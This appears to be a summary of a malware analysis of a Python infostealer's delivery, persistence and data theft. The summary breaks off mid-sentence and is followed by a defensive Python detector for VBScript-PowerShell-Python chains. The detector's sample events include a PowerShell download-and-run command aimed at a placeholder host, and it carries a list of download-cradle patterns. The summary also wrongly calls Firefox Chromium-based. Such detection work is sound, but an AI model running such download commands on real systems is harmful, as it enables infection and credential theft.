The analysis provided details a sophisticated malware campaign that leverages Python-based implants to steal sensitive data from compromised systems. Here's a summary of the key points:
- Distribution Method: The malware is distributed via compressed RAR files containing malicious Python scripts and executables.
- Execution Mechanism:
  - The payload includes an autorun.inf file to automatically execute when the archive is opened.
  - A VBScript (.vbs) file runs a PowerShell command to download and execute a Python script from a remote server.
  - The downloaded Python script then carries out further malicious activity.
- Persistence Mechanism:
  - The malware creates scheduled tasks to ensure persistent execution of its components.
  - It also sets up registry keys for persistence.
- Data Collection Capabilities:
  - Browser Credentials and Cookies: Collects stored passwords and session cookies from major Chromium-based browsers (Chrome, Edge, Firefox) using AES-GCM master key decryption techniques.
  - Keylogging: Captures keystrokes continuously and uploads them periodically to the C2 server.
  - Clipboard Monitoring: Monitors clipboard contents in real time for sensitive information.
  - Screenshot Capture: Uses the mss library to capture desktop
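The execution chain summarised above (script host to PowerShell download cradle to Python interpreter) is something a defender can hunt for in process-creation telemetry. The following is an added detection sketch, not code from the original article or from the analysed malware; the event shape, PIDs, paths and URL are constructed placeholders.

```python
"""Flag wscript/cscript -> powershell (with download cradle) -> python chains.
Added example; events are a constructed, Sysmon-like list of dicts."""
import re
from typing import Dict, List

# Constructed sample telemetry (hosts, paths, PIDs and URL are invented).
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "E:\archive\update.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/s.py -OutFile $env:TEMP\\s.py"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\u\AppData\Local\Programs\Python\python.exe",
     "cmdline": r"python.exe C:\Users\u\AppData\Local\Temp\s.py"},
    # Benign PowerShell: launched by explorer, no cradle, no Python child.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Common download-cradle markers in PowerShell command lines (case-insensitive).
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|\biwr\b|\bcurl\b|\bwget\b|https?://", re.I)

def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_vbs_powershell_python_chains(events: List[Dict]) -> List[Dict]:
    """Return one finding per PowerShell process that (a) was spawned by a
    Windows script host, (b) has a download cradle on its command line and
    (c) spawned a Python interpreter. All three conditions must hold."""
    by_pid = {e["pid"]: e for e in events}
    children: Dict[int, List[Dict]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    findings = []
    for e in events:
        if _basename(e["image"]) != "powershell.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        if not DOWNLOAD_CRADLE.search(e["cmdline"]):
            continue
        py = [c for c in children.get(e["pid"], []) if _basename(c["image"]).startswith("python")]
        if py:
            findings.append({"powershell_pid": e["pid"], "script_host_pid": parent["pid"],
                             "python_pids": [c["pid"] for c in py]})
    return findings
```

Requiring all three links of the chain keeps ordinary administrative PowerShell use (as in the benign sample event) out of the results.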
Read the full article at Malware Analysis, News and Indicators - Latest topics